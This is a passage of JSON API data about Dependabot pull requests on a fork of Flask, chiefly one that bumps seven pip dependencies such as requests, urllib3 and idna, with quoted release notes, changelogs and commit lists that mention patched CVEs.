dependency or upgrade to it yourself)\n- `@dependabot unignore \u003cdependency name\u003e` will remove all of the ignore conditions of the specified dependency\n- `@dependabot unignore \u003cdependency name\u003e \u003cignore condition\u003e` will remove the ignore condition of the specified dependency and ignore conditions\nYou can disable automated security fix PRs for this repo from the [Security Alerts page](https://github.com/sumonst21/flask/network/alerts).\n\n\u003c/details\u003e","html_url":"https://github.com/sumonst21/flask/pull/3","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/sumonst21%2Fflask/issues/3","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/3/packages"},{"uuid":"2579757329","node_id":"PR_kwDOFX7Eos6Zw_kR","number":3,"state":"open","title":"Bump the pip group across 1 directory with 7 updates","user":"dependabot[bot]","labels":["dependencies","python"],"assignees":[],"locked":false,"comments_count":0,"pull_request":true,"closed_at":null,"author_association":"NONE","state_reason":null,"created_at":"2025-06-10T00:21:33.000Z","updated_at":"2025-06-10T00:21:33.000Z","time_to_close":null,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"Bump","group_name":"pip","update_count":7,"packages":[{"name":"certifi","old_version":"2020.11.8","new_version":"2024.7.4","repository_url":"https://github.com/certifi/python-certifi"},{"name":"idna","old_version":"2.10","new_version":"3.7","repository_url":"https://github.com/kjd/idna"},{"name":"py","old_version":"1.10.0","new_version":"1.11.0","repository_url":"https://github.com/pytest-dev/py"},{"name":"requests","old_version":"2.25.0","new_version":"2.32.4","repository_url":"https://github.com/psf/requests"},{"name":"urllib3","old_version":"1.26.4","new_version":"1.26.19","repository_url":"https://github.com/urllib3/urllib3"},{"name":"virtualenv","old_version":"20.2.1","new_version":"20.26.6","repository_url":"https://github.com/pypa/virtualenv"},{"name":"zipp","old_version":"3.4.0","new_version":"3.19.1","repository_url":"https://github.com/jaraco/zipp"}],"path":null,"ecosystem":"pip"},"body":"Bumps the pip group with 7 updates in the / directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [certifi](https://github.com/certifi/python-certifi) | `2020.11.8` | `2024.7.4` |\n| [idna](https://github.com/kjd/idna) | `2.10` | `3.7` |\n| [py](https://github.com/pytest-dev/py) | `1.10.0` | `1.11.0` |\n| [requests](https://github.com/psf/requests) | `2.25.0` | `2.32.4` |\n| [urllib3](https://github.com/urllib3/urllib3) | `1.26.4` | `1.26.19` |\n| [virtualenv](https://github.com/pypa/virtualenv) | `20.2.1` | `20.26.6` |\n| [zipp](https://github.com/jaraco/zipp) | `3.4.0` | `3.19.1` |\n\n\nUpdates `certifi` from 2020.11.8 to 2024.7.4\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/bd8153872e9c6fc98f4023df9c2deaffea2fa463\"\u003e\u003ccode\u003ebd81538\u003c/code\u003e\u003c/a\u003e 2024.07.04 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/295\"\u003e#295\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/06a2cbf21f345563dde6c28b60e29d57e9b210b3\"\u003e\u003ccode\u003e06a2cbf\u003c/code\u003e\u003c/a\u003e Bump peter-evans/create-pull-request from 6.0.5 to 6.1.0 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/294\"\u003e#294\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/13bba02b72bac97c432c277158bc04b4d2a6bc23\"\u003e\u003ccode\u003e13bba02\u003c/code\u003e\u003c/a\u003e Bump actions/checkout from 4.1.6 to 4.1.7 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/293\"\u003e#293\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/e8abcd0e62b334c164b95d49fcabdc9ecbca0554\"\u003e\u003ccode\u003ee8abcd0\u003c/code\u003e\u003c/a\u003e Bump pypa/gh-action-pypi-publish from 1.8.14 to 1.9.0 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/292\"\u003e#292\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/124f4adf171e15cd9a91a8b6e0325ecc97be8fe1\"\u003e\u003ccode\u003e124f4ad\u003c/code\u003e\u003c/a\u003e 2024.06.02 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/291\"\u003e#291\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/c2196ce5d6ee675b27755a19948480a7823e2c6a\"\u003e\u003ccode\u003ec2196ce\u003c/code\u003e\u003c/a\u003e --- (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/290\"\u003e#290\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/fefdeec7588ff1c05214b85a552afcad5fdb51b2\"\u003e\u003ccode\u003efefdeec\u003c/code\u003e\u003c/a\u003e Bump actions/checkout from 4.1.4 to 4.1.5 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/289\"\u003e#289\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/3c5fb1560b826a7f83f1f9750173ff766492c9cf\"\u003e\u003ccode\u003e3c5fb15\u003c/code\u003e\u003c/a\u003e Bump actions/download-artifact from 4.1.6 to 4.1.7 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/286\"\u003e#286\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/4a9569a3eb58db8548536fc16c5c5c7af946a5b1\"\u003e\u003ccode\u003e4a9569a\u003c/code\u003e\u003c/a\u003e Bump actions/checkout from 4.1.2 to 4.1.4 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/287\"\u003e#287\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/1fc808626a895a916b1e4c2b63abae6c5eafdbe3\"\u003e\u003ccode\u003e1fc8086\u003c/code\u003e\u003c/a\u003e Bump peter-evans/create-pull-request from 6.0.4 to 6.0.5 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/288\"\u003e#288\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/certifi/python-certifi/compare/2020.11.08...2024.07.04\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `idna` from 2.10 to 3.7\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/kjd/idna/releases\"\u003eidna's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev3.7\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFix issue where specially crafted inputs to encode() could take exceptionally long amount of time to process. [CVE-2024-3651]\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThanks to Guido Vranken for reporting the issue.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/kjd/idna/compare/v3.6...v3.7\"\u003ehttps://github.com/kjd/idna/compare/v3.6...v3.7\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/kjd/idna/blob/master/HISTORY.rst\"\u003eidna's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003e3.7 (2024-04-11)\n++++++++++++++++\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFix issue where specially crafted inputs to encode() could\ntake exceptionally long amount of time to process. [CVE-2024-3651]\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThanks to Guido Vranken for reporting the issue.\u003c/p\u003e\n\u003cp\u003e3.6 (2023-11-25)\n++++++++++++++++\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFix regression to include tests in source distribution.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e3.5 (2023-11-24)\n++++++++++++++++\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate to Unicode 15.1.0\u003c/li\u003e\n\u003cli\u003eString codec name is now \u0026quot;idna2008\u0026quot; as overriding the system codec\n\u0026quot;idna\u0026quot; was not working.\u003c/li\u003e\n\u003cli\u003eFix typing error for codec encoding\u003c/li\u003e\n\u003cli\u003e\u0026quot;setup.cfg\u0026quot; has been added for this release due to some downstream\nlack of adherence to PEP 517. Should be removed in a future release\nso please prepare accordingly.\u003c/li\u003e\n\u003cli\u003eRemoved reliance on a symlink for the \u0026quot;idna-data\u0026quot; tool to comport\nwith PEP 517 and the Python Packaging User Guide for sdist archives.\u003c/li\u003e\n\u003cli\u003eAdded security reporting protocol for project\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThanks Jon Ribbens, Diogo Teles Sant'Anna, Wu Tingfeng for contributions\nto this release.\u003c/p\u003e\n\u003cp\u003e3.4 (2022-09-14)\n++++++++++++++++\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate to Unicode 15.0.0\u003c/li\u003e\n\u003cli\u003eMigrate to pyproject.toml for build information (PEP 621)\u003c/li\u003e\n\u003cli\u003eCorrect another instance where generic exception was raised instead of\nIDNAError for malformed input\u003c/li\u003e\n\u003cli\u003eSource distribution uses zeroized file ownership for improved\nreproducibility\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThanks to Seth Michael Larson for contributions to this release.\u003c/p\u003e\n\u003cp\u003e3.3 (2021-10-13)\n++++++++++++++++\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate to Unicode 14.0.0\u003c/li\u003e\n\u003cli\u003eUpdate to in-line type annotations\u003c/li\u003e\n\u003cli\u003eThrow IDNAError exception correctly for some malformed input\u003c/li\u003e\n\u003cli\u003eAdvertise support for Python 3.10\u003c/li\u003e\n\u003cli\u003eImprove testing regime on Github\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/1d365e17e10d72d0b7876316fc7b9ca0eebdd38d\"\u003e\u003ccode\u003e1d365e1\u003c/code\u003e\u003c/a\u003e Release v3.7\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/c1b3154939907fab67c5754346afaebe165ce8e6\"\u003e\u003ccode\u003ec1b3154\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/kjd/idna/issues/172\"\u003e#172\u003c/a\u003e from kjd/optimize-contextj\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/0394ec76ff022813e770ba1fd89658790ea35623\"\u003e\u003ccode\u003e0394ec7\u003c/code\u003e\u003c/a\u003e Merge branch 'master' into optimize-contextj\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/cd58a23173d2b0a40b95ee680baf3e59e8d33966\"\u003e\u003ccode\u003ecd58a23\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/kjd/idna/issues/152\"\u003e#152\u003c/a\u003e from elliotwutingfeng/dev\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/5beb28b9dd77912c0dd656d8b0fdba3eb80222e7\"\u003e\u003ccode\u003e5beb28b\u003c/code\u003e\u003c/a\u003e More efficient resolution of joiner contexts\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/1b121483ed04d9576a1291758f537e1318cddc8b\"\u003e\u003ccode\u003e1b12148\u003c/code\u003e\u003c/a\u003e Update ossf/scorecard-action to v2.3.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/d516b874c3388047934938a500c7488d52c4e067\"\u003e\u003ccode\u003ed516b87\u003c/code\u003e\u003c/a\u003e Update Github actions/checkout to v4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/c095c75943413c75ebf8ac74179757031b7f80b7\"\u003e\u003ccode\u003ec095c75\u003c/code\u003e\u003c/a\u003e Merge branch 'master' into dev\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/60a0a4cb61ec6834d74306bd8a1fa46daac94c98\"\u003e\u003ccode\u003e60a0a4c\u003c/code\u003e\u003c/a\u003e Fix typo in GitHub Actions workflow key\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/5918a0ef8034379c2e409ae93ee11d24295bb201\"\u003e\u003ccode\u003e5918a0e\u003c/code\u003e\u003c/a\u003e Merge branch 'master' into dev\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/kjd/idna/compare/v2.10...v3.7\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `py` from 1.10.0 to 1.11.0\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pytest-dev/py/blob/master/CHANGELOG.rst\"\u003epy's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003e1.11.0 (2021-11-04)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eSupport Python 3.11\u003c/li\u003e\n\u003cli\u003eSupport \u003ccode\u003eNO_COLOR\u003c/code\u003e environment variable\u003c/li\u003e\n\u003cli\u003eUpdate vendored apipkg: 1.5 =\u0026gt; 2.0\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/447bac514febbb5433963582103d48bb27b3db17\"\u003e\u003ccode\u003e447bac5\u003c/code\u003e\u003c/a\u003e Update CHANGELOG.rst\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/6d003d9fee08542b9a5ca663568cb30c75d6c27c\"\u003e\u003ccode\u003e6d003d9\u003c/code\u003e\u003c/a\u003e Update CHANGELOG.rst\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/9cf613f3c21ca31f4a1ee9a70e6bd31dc3fe42d9\"\u003e\u003ccode\u003e9cf613f\u003c/code\u003e\u003c/a\u003e Declare support for Python 3.8-3.10\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/d831150a3502363c9ca7242122d8e6cbd229169e\"\u003e\u003ccode\u003ed831150\u003c/code\u003e\u003c/a\u003e Update python_requires: Python 3.4 was already dropped\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/e68532e9d67b089b17f1c96a708ff5f8ccf8bc8b\"\u003e\u003ccode\u003ee68532e\u003c/code\u003e\u003c/a\u003e Update CHANGELOG for 1.11.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/2f03e5a7fd9eb95db110cfd1bf40b987757f9d48\"\u003e\u003ccode\u003e2f03e5a\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pytest-dev/py/issues/258\"\u003e#258\u003c/a\u003e from blueyed/NO_COLOR\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/e116b2bb8e1da9e8aef33c3606bd3d357ae28570\"\u003e\u003ccode\u003ee116b2b\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pytest-dev/py/issues/275\"\u003e#275\u003c/a\u003e from pytest-dev/upgrade-vendor-libs\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/f3a1a59d7d701a76680c2d0b0bd582311b00ded0\"\u003e\u003ccode\u003ef3a1a59\u003c/code\u003e\u003c/a\u003e remove build pin again\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/f6cbf2814a2cc355d0a795233a32dc1285eec93b\"\u003e\u003ccode\u003ef6cbf28\u003c/code\u003e\u003c/a\u003e try to use pipx tox\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/3fe9ad76257860bfcdb25a23539972759ce348ed\"\u003e\u003ccode\u003e3fe9ad7\u003c/code\u003e\u003c/a\u003e try to use preinstalled tox\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pytest-dev/py/compare/1.10.0...1.11.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `requests` from 2.25.0 to 2.32.4\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/psf/requests/releases\"\u003erequests's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev2.32.4\u003c/h2\u003e\n\u003ch2\u003e2.32.4 (2025-06-10)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eSecurity\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eCVE-2024-47081 Fixed an issue where a maliciously crafted URL and trusted\nenvironment will retrieve credentials for the wrong hostname/machine from a\nnetrc file. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6965\"\u003e#6965\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eImprovements\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eNumerous documentation improvements\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eDeprecations\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdded support for pypy 3.11 for Linux and macOS. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6926\"\u003e#6926\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eDropped support for pypy 3.9 following its end of support. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6926\"\u003e#6926\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.32.3\u003c/h2\u003e\n\u003ch2\u003e2.32.3 (2024-05-29)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBugfixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFixed bug breaking the ability to specify custom SSLContexts in sub-classes of\nHTTPAdapter. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6716\"\u003e#6716\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFixed issue where Requests started failing to run on Python versions compiled\nwithout the \u003ccode\u003essl\u003c/code\u003e module. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6724\"\u003e#6724\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.32.2\u003c/h2\u003e\n\u003ch2\u003e2.32.2 (2024-05-21)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eDeprecations\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eTo provide a more stable migration for custom HTTPAdapters impacted\nby the CVE changes in 2.32.0, we've renamed \u003ccode\u003e_get_connection\u003c/code\u003e to\na new public API, \u003ccode\u003eget_connection_with_tls_context\u003c/code\u003e. Existing custom\nHTTPAdapters will need to migrate their code to use this new API.\n\u003ccode\u003eget_connection\u003c/code\u003e is considered deprecated in all versions of Requests\u0026gt;=2.32.0.\u003c/p\u003e\n\u003cp\u003eA minimal (2-line) example has been provided in the linked PR to ease\nmigration, but we strongly urge users to evaluate if their custom adapter\nis subject to the same issue described in CVE-2024-35195. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6710\"\u003e#6710\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.32.1\u003c/h2\u003e\n\u003ch2\u003e2.32.1 (2024-05-20)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBugfixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdd missing test certs to the sdist distributed on PyPI.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.32.0\u003c/h2\u003e\n\u003cp\u003e2.32.0 (2024-05-20)\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/psf/requests/blob/main/HISTORY.md\"\u003erequests's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e2.32.4 (2025-06-10)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eSecurity\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eCVE-2024-47081 Fixed an issue where a maliciously crafted URL and trusted\nenvironment will retrieve credentials for the wrong hostname/machine from a\nnetrc file.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eImprovements\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eNumerous documentation improvements\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eDeprecations\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdded support for pypy 3.11 for Linux and macOS.\u003c/li\u003e\n\u003cli\u003eDropped support for pypy 3.9 following its end of support.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.32.3 (2024-05-29)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBugfixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFixed bug breaking the ability to specify custom SSLContexts in sub-classes of\nHTTPAdapter. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6716\"\u003e#6716\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFixed issue where Requests started failing to run on Python versions compiled\nwithout the \u003ccode\u003essl\u003c/code\u003e module. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6724\"\u003e#6724\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.32.2 (2024-05-21)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eDeprecations\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eTo provide a more stable migration for custom HTTPAdapters impacted\nby the CVE changes in 2.32.0, we've renamed \u003ccode\u003e_get_connection\u003c/code\u003e to\na new public API, \u003ccode\u003eget_connection_with_tls_context\u003c/code\u003e. Existing custom\nHTTPAdapters will need to migrate their code to use this new API.\n\u003ccode\u003eget_connection\u003c/code\u003e is considered deprecated in all versions of Requests\u0026gt;=2.32.0.\u003c/p\u003e\n\u003cp\u003eA minimal (2-line) example has been provided in the linked PR to ease\nmigration, but we strongly urge users to evaluate if their custom adapter\nis subject to the same issue described in CVE-2024-35195. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6710\"\u003e#6710\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.32.1 (2024-05-20)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBugfixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdd missing test certs to the sdist distributed on PyPI.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.32.0 (2024-05-20)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eSecurity\u003c/strong\u003e\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/021dc729f0b71a3030cefdbec7fb57a0e80a6cfd\"\u003e\u003ccode\u003e021dc72\u003c/code\u003e\u003c/a\u003e Polish up release tooling for last manual release\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/821770e822a20a21b207b3907ea83878bda1d396\"\u003e\u003ccode\u003e821770e\u003c/code\u003e\u003c/a\u003e Bump version and add release notes for v2.32.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/59f8aa2adf1d3d06bcbf7ce6b13743a1639a5401\"\u003e\u003ccode\u003e59f8aa2\u003c/code\u003e\u003c/a\u003e Add netrc file search information to authentication documentation (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6876\"\u003e#6876\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/5b4b64c3467fd7a3c03f91ee641aaa348b6bed3b\"\u003e\u003ccode\u003e5b4b64c\u003c/code\u003e\u003c/a\u003e Add more tests to prevent regression of CVE 2024 47081\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/7bc45877a86192af77645e156eb3744f95b47dae\"\u003e\u003ccode\u003e7bc4587\u003c/code\u003e\u003c/a\u003e Add new test to check netrc auth leak (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6962\"\u003e#6962\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/96ba401c1296ab1dda74a2365ef36d88f7d144ef\"\u003e\u003ccode\u003e96ba401\u003c/code\u003e\u003c/a\u003e Only use hostname to do netrc lookup instead of netloc\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/7341690e842a23cf18ded0abd9229765fa88c4e2\"\u003e\u003ccode\u003e7341690\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/psf/requests/issues/6951\"\u003e#6951\u003c/a\u003e from tswast/patch-1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/6716d7c9f29df636643fa2489f98890216525cb0\"\u003e\u003ccode\u003e6716d7c\u003c/code\u003e\u003c/a\u003e remove links\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/a7e1c745dc23c18e836febd672416ed0c5d8d8ae\"\u003e\u003ccode\u003ea7e1c74\u003c/code\u003e\u003c/a\u003e Update docs/conf.py\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/c799b8167a13416833ad3b4f3298261a477e826f\"\u003e\u003ccode\u003ec799b81\u003c/code\u003e\u003c/a\u003e docs: fix dead links to kenreitz.org\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/psf/requests/compare/v2.25.0...v2.32.4\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `urllib3` from 1.26.4 to 1.26.19\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/urllib3/urllib3/releases\"\u003eurllib3's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e1.26.19\u003c/h2\u003e\n\u003ch2\u003e🚀 urllib3 is fundraising for HTTP/2 support\u003c/h2\u003e\n\u003cp\u003e\u003ca href=\"https://sethmlarson.dev/urllib3-is-fundraising-for-http2-support\"\u003eurllib3 is raising ~$40,000 USD\u003c/a\u003e to release HTTP/2 support and ensure long-term sustainable maintenance of the project after a sharp decline in financial support for 2023. If your company or organization uses Python and would benefit from HTTP/2 support in Requests, pip, cloud SDKs, and thousands of other projects \u003ca href=\"https://opencollective.com/urllib3\"\u003eplease consider contributing financially\u003c/a\u003e to ensure HTTP/2 support is developed sustainably and maintained for the long-haul.\u003c/p\u003e\n\u003cp\u003eThank you for your support.\u003c/p\u003e\n\u003ch2\u003eChanges\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdded the \u003ccode\u003eProxy-Authorization\u003c/code\u003e header to the list of headers to strip from requests when redirecting to a different host. As before, different headers can be set via 